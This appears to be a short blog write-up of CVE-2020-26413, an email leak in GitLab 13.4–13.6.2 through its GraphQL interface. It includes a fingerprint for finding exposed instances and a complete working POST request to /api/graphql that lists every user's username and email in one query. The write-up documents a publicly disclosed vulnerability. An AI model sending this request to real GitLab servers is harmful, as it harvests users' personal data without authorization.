Post

Gitlab Graphql Email Information Leakage Vulnerability Cve 2020 26413

Gitlab Graphql Email Information Leakage Vulnerability Cve 2020 26413

GitLab Graphql email information leakage vulnerability CVE-2020-26413

Vulnerability Description

There is a Graphql interface in GitLab. When entering constructed data, the user’s mailbox and username will be leaked.

Vulnerability Impact

GitLab 13.4 - 13.6.2

Network surveying and mapping

title=”GitLab”

Vulnerability reappears

The source of the vulnerability is a public report on hackone


img

Meaning that when using constructed statements, the mailbox information will be returned when querying the interface, as shown in the figure

</a-alert>

img

Gitlab itself does not allow access to account email information. Here, the email leak vulnerability is caused by calling Graphql username query.

After viewing the report, I found that the exploit requires an account username. I cannot get the email without knowing it. Check it in [Graphql official website] (https://graphql.cn/) and you can return all usernames and emails at one time through another constructed statement.

img

The packet sends data by calling the /api/graphql interface

The complete data packet is

1
2
3
4
5
6
7
POST /api/graphql HTTP/1.1
Host:
Content-Length: 212
Content-Type: application/json


{"query":"{\nusers {\nedges {\n  node {\n    username\n    email\n    avatarUrl\n    status {\n      emoji\n      message\n      messageHtml\n     }\n    }\n   }\n  }\n }","variables":null,"operationName":null}

img

Successfully returned data, causing Gitlab user email information to leak

This post is licensed under CC BY 4.0 by the author.